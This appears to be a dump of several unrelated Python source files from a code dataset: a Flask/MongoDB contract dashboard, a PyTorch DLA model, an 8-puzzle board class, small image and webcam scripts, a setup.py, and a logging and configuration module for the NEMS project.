json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/contract.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/contract.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/contract.html',\n error='Enter the required values in the right format in the required fields')\n\n\n else:\n return render_template('dashboard/contract.html',\n error='OCID/Project is invalid or does not exist. Create New Release or Open Contracting Process')\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/tender.html,error = 'A Tender already exists with that OCID or OCID is invalid')\n\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n ################################### START OF CONTRACT MODAL\n\n\n # retrieve contracts method\n @app.route('/getContracts', methods=['POST'])\n def getContracts():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n sd = release['contracts']['signeddate']\n dString = sd.strftime(\"%Y-%m-%d\")\n\n startd = release['contracts']['period']['startDate']\n startString = startd.strftime(\"%Y-%m-%d\")\n\n endd = release['contracts']['period']['endDate']\n endString = endd.strftime(\"%Y-%m-%d\")\n\n # THE ARRAY IS A LIST\n coord = release['contracts']['projectlocation']['coord']\n\n # for rev in inrel['contracts']['projectlocation']['coord']:\n # print rev\n release_dict = {\n 'OCID': release['ocid'],\n 'contract_Description': release['contracts']['description'],\n 'reference': release['contracts']['reference'],\n 'contract_status': release['contracts']['status'],\n 'contract_date': dString,\n 'start_date': startString,\n 'end_date': endString,\n 'street': release['contracts']['projectlocation']['streetaddress'],\n 'city': release['contracts']['projectlocation']['city'],\n 'state': release['contracts']['projectlocation']['state'],\n 'country': release['contracts']['projectlocation']['country'],\n 'longit': coord[0],\n 'latitude': coord[1]\n }\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # get particular contract information\n @app.route('/getContractById', methods=['POST'])\n def getContractById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n response = []\n releases_dict = []\n\n release_dict = {\n 'award_status': releases['contracts']['status']\n\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n # print(json.dumps(response\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n #############################################End of DATA FETCHING METHODS\n\n\n\n # update contract\n @app.route('/updateContract', methods=['POST'])\n def updateContract():\n try:\n if session.get('user'):\n _status = request.form['status']\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"contracts.status\": _status\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n ################################### END OF CONTRACT MODAL\n\n\n\n # begin contract implementation\n @app.route('/newImplementation', methods=['POST'])\n def newImplementation():\n try:\n if session.get('user'):\n _release_id = request.form['id']\n variationYesOrNo = request.form.get('variationYesOrNo', '')\n bppapprovalNumber = request.form.get('bppapprovalNumber', '')\n variationamountt = int(request.form.get('variationamountt', ''))\n totalValue = int(request.form.get('totalValue', ''))\n print(variationYesOrNo)\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"contracts.implementation.variation\": variationYesOrNo,\n \"contracts.implementation.variationamount\": variationamountt,\n \"contracts.implementation.revisedcontractamount\": totalValue,\n \"contracts.implementation.bppapproval\": bppapprovalNumber\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n # update contract completion\n @app.route('/updateImplementation', methods=['POST'])\n def updateImplementation():\n try:\n if session.get('user'):\n _release_id = request.form['id']\n finalcost = int(request.form.get('finalcost', ''))\n status = request.form.get('status', '')\n completiontilldate = request.form.get('projcompletion', '')\n amount = int(request.form.get('amount', ''))\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"contracts.implementation.finalcost\": finalcost,\n \"contracts.implementation.projectstatus\": status,\n \"contracts.implementation.tilldate\": completiontilldate\n }\n\n })\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$push\":\n {\n \"contracts.implementation.amountspaid\": amount\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n ##################################CONTRACTS PAGE SEARCH\n\n # https://code.tutsplus.com/tutorials/full-text-search-in-mongodb--cms-24835\n # create search index on collection during config as specified above\n # db.releases.createIndex({\"$**\":\"text\"})\n # db.releases.getIndexes()\n # db.releases.dropIndex(\"$**_text\")\n\n\n # testing date\n # createIndex({\"releases.contracts.period.startDate\":1, \"releases.contracts.period.endDate\":1,\"$**\":\"text\"})\n\n\n\n # retrieve contracts method\n @app.route('/contractSearch', methods=['POST'])\n def contractSearch():\n try:\n _offset = int(request.form['offset'])\n searchString = request.form['searchString']\n\n # startDate = request.form['startDate']\n # endDate = request.form['endDate']\n\n # print(startDate)\n # print(endDate)\n print(searchString)\n\n _limit = pageLimit\n\n releases = db.releases.find({\"$text\": {\"$search\": searchString}})\n\n res = db.releases.find({\"$text\": {\"$search\": searchString}}).count()\n\n print(res)\n # releases = db.releases.find({\"releases.buyer.identifier.legalName\":_agencyName}).sort([('_id', -1)]).skip(_offset).limit(_limit)\n\n # res = db.releases.find({\"releases.buyer.identifier.legalName\":_agencyName}).count()\n # print(res)\n\n\n\n if res > 0:\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n sd = release['contracts']['signeddate']\n dString = sd.strftime(\"%Y-%m-%d\")\n\n startd = release['contracts']['period']['startDate']\n startString = startd.strftime(\"%Y-%m-%d\")\n\n endd = release['contracts']['period']['endDate']\n endString = endd.strftime(\"%Y-%m-%d\")\n\n # THE ARRAY IS A LIST\n coord = release['contracts']['projectlocation']['coord']\n\n # for rev in inrel['contracts']['projectlocation']['coord']:\n # print rev\n release_dict = {\n 'OCID': release['ocid'],\n 'contract_Description': release['contracts']['description'],\n 'reference': release['contracts']['reference'],\n 'contract_status': release['contracts']['status'],\n 'contract_date': dString,\n 'start_date': startString,\n 'end_date': endString,\n 'street': release['contracts']['projectlocation']['streetaddress'],\n 'city': release['contracts']['projectlocation']['city'],\n 'state': release['contracts']['projectlocation']['state'],\n 'country': release['contracts']['projectlocation']['country'],\n 'longit': coord[0],\n 'latitude': coord[1]\n }\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n else:\n print('no result')\n return render_template('dashboard/mycontracts.html', error='No results found')\n\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n\n ###################################END CONTRACTS PAGE SEARCH\n\n\n##############################################################################################Dashboard#####################################################################################################\n\n\n##############################################################################################Releases#####################################################################################################\n\n\n\n\n\n\n\n################################################################################################\n\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":140317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"224577187","text":"\"\"\"socket client\"\"\"\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# WEB:80,FTP:21,SMTP:25,小于1024的是Internet标准服务的端口\n# tuple\ns.connect(('127.0.0.1', 9999))\nprint(s.recv(1024).decode('utf-8'))\nfor data in [b'he', b'yi', b'feng']:\n s.send(data)\n print(s.recv(2014).decode('utf-8'))\ns.send(b'exit')\ns.close()\n","sub_path":"socketclient.py","file_name":"socketclient.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"542484551","text":"'''Simplified version of DLA in PyTorch.\n\nNote this implementation is not identical to the original paper version.\nBut it seems works fine.\n\nSee dla.py for the original paper version.\n\nReference:\n Deep Layer Aggregation. https://arxiv.org/abs/1707.06484\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Root(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1):\n super(Root, self).__init__()\n self.conv = nn.Conv2d(\n in_channels, out_channels, kernel_size,\n stride=1, padding=(kernel_size - 1) // 2, bias=False)\n self.bn = nn.BatchNorm2d(out_channels)\n\n def forward(self, xs):\n x = torch.cat(xs, 1)\n out = F.relu(self.bn(self.conv(x)))\n return out\n\n\nclass Tree(nn.Module):\n def __init__(self, block, in_channels, out_channels, level=1, stride=1):\n super(Tree, self).__init__()\n self.root = Root(2*out_channels, out_channels)\n if level == 1:\n self.left_tree = block(in_channels, out_channels, stride=stride)\n self.right_tree = block(out_channels, out_channels, stride=1)\n else:\n self.left_tree = Tree(block, in_channels,\n out_channels, level=level-1, stride=stride)\n self.right_tree = Tree(block, out_channels,\n out_channels, level=level-1, stride=1)\n\n def forward(self, x):\n out1 = self.left_tree(x)\n out2 = self.right_tree(out1)\n out = self.root([out1, out2])\n return out\n\n\nclass DLA(nn.Module):\n def __init__(self, block=BasicBlock):\n super(DLA, self).__init__()\n self.base = nn.Conv2d(3, 16, kernel_size=1, stride=1, bias=True)\n\n self.layer1 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer2 = nn.Conv2d(16, 32, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer3 = Tree(block, 32, 256, level=1, stride=3)\n self.linear7 = nn.Linear(1024, 512)\n self.linear8 = nn.Linear(512, 256)\n self.linear9 = nn.Linear(256, 64)\n self.linear10 = nn.Linear(64, 10)\n self.dropout_input = 0.0\n self.dropout_hidden = 0.0\n self.is_training = True\n\n def forward(self, x):\n out = self.base(x)\n out = F.dropout(out, p=self.dropout_input, training=self.is_training)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n # print(f'!!!!!!!!!!!!!!!!!!!!!!!!!!!! out shape should be {out.shape}')\n out = self.linear7(out)\n out = self.linear8(out)\n out = self.linear9(out)\n out = self.linear10(out)\n return out\n\n\nclass PartConv(nn.Module):\n def __init__(self, block=BasicBlock, num_classes=10):\n super(PartConv, self).__init__()\n #self.base = nn.Conv2d(3, 16, kernel_size=1, stride=1, bias=True)\n\n self.layer1 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer2 = nn.Conv2d(16, 32, kernel_size=3, stride=1, padding=1, bias=True)\n\n self.layer3 = Tree(block, 32, 256, level=1, stride=3)\n self.linear7 = nn.Linear(1024, 512)\n self.linear8 = nn.Linear(512, 256)\n self.linear9 = nn.Linear(256, 64)\n #self.linear10 = nn.Linear(64, 10)\n self.dropout_input = 0.0\n self.dropout_hidden = 0.0\n self.is_training = True\n\n def forward(self, x):\n #out = self.base(x)\n out = F.dropout(x, p=self.dropout_input, training=self.is_training)\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n # print(f'!!!!!!!!!!!!!!!!!!!!!!!!!!!! out shape should be {out.shape}')\n out = self.linear7(out)\n out = self.linear8(out)\n out = self.linear9(out)\n #out = self.linear10(out)\n return out\n","sub_path":"dla_simple.py","file_name":"dla_simple.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53313361","text":"class Board:\n\n def __init__(self, input_tiles):\n self.tiles = input_tiles\n self.history = []\n\n @classmethod\n def sample(cls):\n return Board([1, 2, 3, 4, 0, 5, 6, 7, 8])\n\n def move_up(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[0]:\n self.tiles[gap] = self.tiles[gap - 3]\n self.tiles[gap - 3] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def move_down(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[2]:\n self.tiles[gap] = self.tiles[gap + 3]\n self.tiles[gap + 3] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def move_left(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[3]:\n self.tiles[gap] = self.tiles[gap - 1]\n self.tiles[gap - 1] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def move_right(self):\n gap = self.gap()\n can_go = self.can_go()\n if can_go[1]:\n self.tiles[gap] = self.tiles[gap + 1]\n self.tiles[gap + 1] = 0\n self.add_history()\n else:\n raise BoardException('invalid move')\n\n def gap(self):\n return self.tiles.index(0)\n\n def can_go(self):\n if (self.gap() - 3) <= -1:\n go_up = False\n else:\n go_up = True\n\n if (self.gap() + 3) >= 9:\n go_down = False\n else:\n go_down = True\n\n if ((self.gap() + 1) % 3) == 0:\n go_right = False\n else:\n go_right = True\n\n if ((self.gap() + 3) % 3) == 0:\n go_left = False\n else:\n go_left = True\n\n return [go_up, go_right, go_down, go_left]\n\n def print_board(self):\n for tile in self.tiles:\n if self.tiles.index(tile) not in [2, 5, 8]:\n end = ' '\n else:\n end = \"\\n\"\n\n if tile == 0:\n print(' ', end=end)\n else:\n print(tile, end=end)\n\n def add_history(self):\n self.history.append(self)\n\nclass BoardException(Exception):\n def __init___(self, args):\n Exception.__init__(self, str(args))\n self.args = args\n\n","sub_path":"src/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"208458510","text":"#!/usr/bin/env python\n\n\"\"\"Pycon Funnel App\"\"\"\n\nfrom setuptools import find_packages, setup\n\ndependencies = ['setuptools', 'flask', 'subprocess', 'jinja2', 'urllib2', 'BeautifulSoup4',]\n\nsetup(name = 'Pycon_Funnel_App',\n version = '0.1',\n description = \"An app to see Pycon India 2013 Statistics.\",\n platforms = [\"Linux\"],\n author = \"Shantanu Sarkar, Shalini Roy, Sheesh Mohsin\",\n author_email = \"shantanusarkar.me@gmail.com\",\n url = \"http://dgplug.org/summertraining/2013/\",\n license = \"MIT\",\n install_requires=[\n \"setuptools\",\n \"flask\",\n \"subprocess\",\n \"jinja2\",\n \"urllib2\",\n \"BeautifulSoup4\",\n \"pyparsing\",\n ],\n include_package_data=True,\n scripts = ['project1'],\n dependency_links=[\n \"https://pypi.python.org/packages/source/F/Flask-Admin/Flask-Admin-1.0.7.tar.gz\",\n \"https://pypi.python.org/packages/source/s/subprocess.run/subprocess.run-0.0.8.tar.gz\",\n \"https://pypi.python.org/packages/source/J/Jinja2/Jinja2-2.7.1.tar.gz\",\n \"https://pypi.python.org/packages/source/h/httpsproxy_urllib2/httpsproxy_urllib2-1.0.tar.gz\",\n \"https://pypi.python.org/packages/source/b/beautifulsoup4/beautifulsoup4-4.3.2.tar.gz\",\n \"https://pypi.python.org/pypi/pyparsing/2.0.1#downloads\",\n ],\n packages = find_packages()\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"280475960","text":"from PIL import Image, ImageDraw, ImageFont\nimport sys\n\nfoo = \"0123456789ABCDEF\"\n\nimg = Image.open(sys.argv[1])\n\ndraw = ImageDraw.Draw(img)\n\nw,h = img.size\ngw = w / 16\ngh = h / 16\n\nfs = gw / 2\nfontsize = 8\nfont = ImageFont.truetype(\"LiberationSans-Bold.ttf\", fontsize)\nwhile font.getsize(\"AA\")[0] < fs:\n fontsize += 1\n font = ImageFont.truetype(\"LiberationSans-Bold.ttf\", fontsize)\n\n\n\nfor i,c in enumerate(foo):\n for j,k in enumerate(foo):\n fw,fh = font.getsize(c+k)\n y = int(i * gh + (gh - fh) / 2)\n x = int(j * gw + (gw - fw) / 2)\n draw.text((x,y),c+k, font=font)\n\nfor i in xrange(len(foo)-1):\n draw.line(((i+1)*gw,0,(i+1)*gw,h))\n draw.line((0,(i+1)*gh,w,(i+1)*gh))\nimg.save(sys.stdout, \"PNG\")\n","sub_path":"arch/addGrid.py","file_name":"addGrid.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"460064093","text":"# Rotating Image Effect\n# Rotating Webcam Input\n\n\nimport cv2\nimport time\n\ndef main():\n \n\twindowName = \"Live Video Feed\"\n\tcv2.namedWindow(windowName)\n\tcap = cv2.VideoCapture(0)\n\t\t\n\tif cap.isOpened():\n\t\tret, frame = cap.read()\n\telse:\n\t\tret = False\n\t\t\n\trows, columns, channels = frame.shape\n\tangle = 0\n\tscale = 1\n\t\t\n\twhile True:\n\t\tret, frame = cap.read()\n\t\t\t\t\n\t\tif angle == 360:\n\t\t\tangle = 0\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\tR = cv2.getRotationMatrix2D((columns/2, rows/2), angle, scale)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\toutput = cv2.warpAffine(frame, R, (columns, rows))\n\t\t\t\n\t\t\t\n\t\tcv2.imshow(windowName, output)\n\t\tangle = angle + 1\n\t\ttime.sleep(0.5)\n\t\t\t\t\n\t\tif cv2.waitKey(1) == 27:\n\t\t\tbreak\n\t\t\t\n\tcv2.destroyWindow(windowName)\n\tcap.release()\n\nif __name__ == \"__main__\":\n main()","sub_path":"WebCam_input_rotation.py","file_name":"WebCam_input_rotation.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"562616032","text":"\"\"\" Default configurations for nems_config. Should fall back on these when\na config file is not present (i.e. if Storage_Config.py doesn't exist, import\nnems_config.defaults.STORAGE_DEFAULTS instead).\n\nAlso stores defaults for interface options, such as which columns to show\non the results table or what minimum SNR to require for plots by default.\n\n\"\"\"\n\nimport sys\nimport logging\n# Used 'root' instead of __name__ because the pre-configuration logging\n# would not show up otherwise.\n# And then root stopped showing up too...\n# TODO: Figure out best way to get log statements in this module\n# to show up with the others.\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s, \"\n \"line %(lineno)s:\\n%(message)s\\n\")\nch = logging.StreamHandler(stream=sys.stdout)\nch.setFormatter(formatter)\nch.setLevel(logging.DEBUG)\nlog.addHandler(ch)\n\nfrom pathlib import Path\nimport importlib\nimport os\nimport warnings\nimport traceback\nimport errno\nimport logging.config\nimport datetime as dt\nimport boto3\nfrom botocore import UNSIGNED\nfrom botocore.config import Config\n\nimport demo as ns\nimport nems_logs\nSAMPLE_PATH = os.path.dirname(os.path.abspath(ns.__file__))\nNEMS_LOGS_PATH = os.path.dirname(os.path.abspath(nems_logs.__file__))\n# stays false unless changed by db.py if database info is missing\nDEMO_MODE = False\n\nclass UI_OPTIONS():\n cols = ['r_test', 'r_fit', 'n_parms']\n rowlimit = 500\n sort = 'cellid'\n # specifies which columns from narf results can be used to quantify\n # performance for plots\n measurelist = [\n 'r_test' , 'r_ceiling', 'r_fit', 'r_active', 'mse_test',\n 'mse_fit', 'mi_test', 'mi_fit', 'nlogl_test',\n 'nlogl_fit', 'cohere_test', 'cohere_fit',\n ]\n # any columns in this list will always show on results table\n required_cols = ['cellid', 'modelname']\n # specifies which columns to display in 'details' tab for analysis\n detailcols = ['id', 'status', 'question', 'answer']\n # default minimum values for filtering out cells before plotting\n iso = 0\n snr = 0\n snri = 0\n\nclass STORAGE_DEFAULTS():\n DIRECTORY_ROOT = SAMPLE_PATH\n USE_AWS = False\n\nclass FLASK_DEFAULTS():\n Debug = False\n COPY_PRINTS = False\n CSRF_ENABLED = True\n\nclass LOGGING_DEFAULTS():\n \"\"\" Specifies default configuration for nems logging. To change settings\n for a local configuration, place a file named \"Logging_Config.py\" in the\n nems_config directory with the same structure as this class. Alternatively,\n if a different log file is desired but all other settings can remain the\n same, the filepath and/or log name can be specified in the NEMSLOG and\n NEMSLOGPATH environment variables. Similarly, the logging levels for\n the console and file handlers can be overriden with variables\n NEMSLVLCON and NEMSLVLFILE, respectively.\n\n Order of precendence when settings conflict between environment variables,\n top-level config file variables, and dictionary values:\n 1st: Environment Variables\n 2nd: Top-level Variables\n 3rd: Dictionary Value\n\n Example Logging_Config contents:\n Copy & paste the whole class, then make tweaks as desired\n (log_root doesn't have to be included if the default is acceptable,\n but keeping the full logging_config dict as a scaffold is recommended):\n log_root = 'my/file/path'\n\n logging_config = {\n 'version': 1,\n 'formatters': {\n 'basic': {'format': '}\n 'my_formatter': {'format': '%(asctime)s -- %(message)s'},\n },\n 'handlers': {\n 'console':\n ... [abbreviated],\n 'formatter': 'my_formatter',\n },\n 'loggers': {\n ... [abbreviated]\n },\n 'root': {\n 'handlers': ['console'],\n },\n }\n\n Example environment variable specifications:\n #1) Specify exact file name:\n NEMSLOG='/my/file/path/log_name.log'\n export NEMSLOG\n nems-fit-single . . .\n\n #2) Specify directory root, but let nems decide the file name:\n NEMSLOGPATH='/my/file/path/'\n export NEMSLOGPATH\n nems-fit-single . . .\n\n #3) Specify different log levels for the console and file handlers:\n NEMSLVLFILE='INFO'\n NEMSLVLCON='WARNING'\n export NEMSLVLFILE NEMSLVLCON\n nems-fit-single . . .\n\n NOTES: -If NEMSLOG is specified, it will override NEMSLOGPATH.\n -The top-level log_root variable overrides any filename specified\n within the config dictionary, so it should be reassigned to a blank\n string (i.e. '') if a filename specified in the dictionary\n is desired.\n\n \"\"\"\n\n # directory to store log files in\n log_root = NEMS_LOGS_PATH\n # log levels for the respective handlers\n # note: these levels will override values in the dictionary if specified.\n console_level = 'INFO'\n file_level = 'DEBUG'\n\n logging_config = {\n 'version': 1,\n 'formatters': {\n 'basic': {'format': (\n \"%(asctime)s : %(levelname)s : %(name)s, \"\n \"line %(lineno)s:\\n%(message)s\\n\"\n )\n },\n 'short': {'format': \"%(name)s, %(lineno)s : %(message)s\\n\"},\n },\n 'handlers': {\n # only console logger included by default,\n # log file added at runtime if filename is present\n # (a default filename will be present unless overwritten)\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'short',\n 'level': 'INFO',\n },\n 'file': {\n 'class': 'logging.FileHandler',\n 'formatter': 'basic',\n 'encoding': 'UTF-8',\n 'filename': '',\n 'mode': 'a',\n # 0: none, 10: DEBUG, 20: INFO, 30: WARNING,\n # 40: ERROR, 50: CRITICAL\n 'level': 'DEBUG',\n }\n },\n 'loggers': {\n # This level should be left at DEBUG;\n # to adjust message display, change logging level for\n # console and/or file handlers as needed\n 'nems': {'level': 'DEBUG'},\n 'nems_config': {'level': 'DEBUG'},\n 'nems_scripts': {'level': 'DEBUG'},\n 'nems_web': {'level': 'DEBUG'},\n },\n 'root': {\n 'handlers': ['console'],\n },\n }\n\ndef update_settings(module_name, default_class):\n \"\"\" Overwrites contents of default_class with contents of the specified\n config module. Only attributes specified in the config module will be\n overwritten, others are left as defaults.\"\"\"\n\n try:\n log.debug(\"Attempting to update {0} with values from {1}\"\n .format(default_class, module_name))\n mod = importlib.import_module('.' + module_name, 'nems_config')\n except Exception as e:\n log.debug(\"Error when attempting to import settings for {0}: {1}\"\n .format(e, module_name))\n log.debug(\"Couldn't import settings for: {0} -- using defaults... \"\n .format(module_name))\n return\n\n for key in mod.__dict__:\n setattr(default_class, key, getattr(mod, key))\n\n# update config classes with variables specified in user-provided\n# config modules.\nupdate_settings(\"Storage_Config\", STORAGE_DEFAULTS)\nupdate_settings(\"Flask_Config\", FLASK_DEFAULTS)\nupdate_settings(\"Logging_Config\", LOGGING_DEFAULTS)\n\ndef configure_logging():\n logging_config = LOGGING_DEFAULTS.logging_config\n console_level = LOGGING_DEFAULTS.console_level\n file_level = LOGGING_DEFAULTS.file_level\n log_root = LOGGING_DEFAULTS.log_root\n # filename should be an empty string unless added by user\n filename = logging_config['handlers']['file']['filename']\n\n # filename specified by environment variable will take precedence\n try:\n filename = os.environ['NEMSLOG']\n except:\n log.debug(\"No filename specified in OS environment, trying file\"\n \"specified in Logging_Config or LOGGING_DEFAULTS\")\n try:\n # root directory in environment variables takes precedence\n log_root = os.environ['NEMSLOGPATH']\n except:\n log.debug(\"No fileroot specified in OS environment, trying\"\n \"path specified in Logging_Config or LOGGING_DEFAULTS\")\n if log_root:\n # if log_root wasn't removed by user, set log file to\n # time-based filename inside that directory\n timestamp = dt.datetime.now().strftime('%Y-%m-%d')\n file = 'nemslog_{0}.log'.format(timestamp)\n filename = os.path.join(log_root, file)\n try:\n os.makedirs(log_root)\n except OSError as e:\n # check if error was because directory already exists\n if e.errno != errno.EEXIST:\n log.debug(\"Log file directory could not be created: {0} --\"\n \"\\nError: {1}\"\n .format(log_root, e))\n filename = None\n else:\n pass\n\n if filename:\n # if log_root wasn't specified, but a filename was, try\n # creating directory from filename instead.\n # find the last / in filename, and chop off the rest to get root\n root_idx = filename.rfind('/')\n file_root = filename[:root_idx+1]\n try:\n os.makedirs(file_root)\n except OSError as e:\n if e.errno != errno.EEXIST:\n log.debug(\"Log file directory could not be created: {0} --\"\n \"\\nError: {1}\"\n .format(file_root, e))\n filename = None\n else:\n pass\n\n # levels specified in environment variables will take precedence\n try:\n console_level = os.environ['NEMSLVLCON']\n except:\n pass\n try:\n file_level = os.environ['NEMSLVLFILE']\n except:\n pass\n\n log.debug(\"log filename ended up being: %s\"%filename)\n # if file handler was'nt removed by user and filename isn't blank,\n # configure the relevant keys and add the file handler to the root.\n if filename and 'file' in logging_config['handlers']:\n logging_config['handlers']['file']['filename'] = filename\n logging_config['handlers']['file']['level'] = file_level\n logging_config['root']['handlers'].append('file')\n logging_config['handlers']['console']['level'] = console_level\n log.debug(\"logging_config dict ended up being: %s\"%logging_config)\n logging.config.dictConfig(logging_config)\n\ntry:\n configure_logging()\n log.debug(\"logging successfully configured.\")\n # reconfigure logger for this module after settings applied\n log = logging.getLogger(__name__)\nexcept Exception as e:\n log.warning(\"Attempt to configure logging resulted in error: {0}\"\n .format(e))\n\n# send uncaught exceptions to log file if file handler is set up.\n# will also go to console as normal.\nexlogger_name = \"Uncaught_Exception\"\nexlog = logging.getLogger(exlogger_name)\ndef uncaught_exception_handler(type, value, tb):\n string = \"{0}, TRACEBACK:\".format(type)\n hashline = \"#\"*(len(string)+len(exlogger_name)+2)\n exlog.exception(\"{0}\\n{1}\\n\".format(string, hashline))\n tblist = traceback.format_list(traceback.extract_tb(tb))\n for i, tb in enumerate(tblist):\n exlog.exception(str(i) + \": \" + tb)\nsys.excepthook = uncaught_exception_handler\n\n# TODO: add logger for warnings formatting\n#import sys\n#import warnings\n#import traceback\n#def warn_with_traceback(message, category, filename, lineno, file=None,\n# line=None):\n# log = file if hasattr(file, 'write') else sys.stderr\n# traceback.print_stack(file=log)\n# log.write(warnings.formatwarning(message, category, filename,\n# lineno, line))\n#warnings.showwarning = warn_with_traceback\n\n\ndb_path = os.path.join(SAMPLE_PATH, 'demo_db.db')\nlog.debug(\"db_path for demo ended up being: {0}\".format(db_path))\ndb_obj = Path(db_path)\n# Check if sample database exists. If it doesn't, get it from the public s3\nif not db_obj.exists():\n log.info(\"Demo database not found, retrieving....\")\n s3_client = boto3.client(\n 's3',\n #aws_access_key_id='dummyid', aws_secret_access_key='dummykey',\n #aws_session_token='dummytoken',\n #config=Config(signature_version=UNSIGNED),\n )\n key = \"demodb/demo_db.db\"\n fileobj = s3_client.get_object(Bucket='nemspublic', Key=key)\n with open(db_path, 'wb+') as f:\n f.write(fileobj['Body'].read())\n log.info(\"Demo database 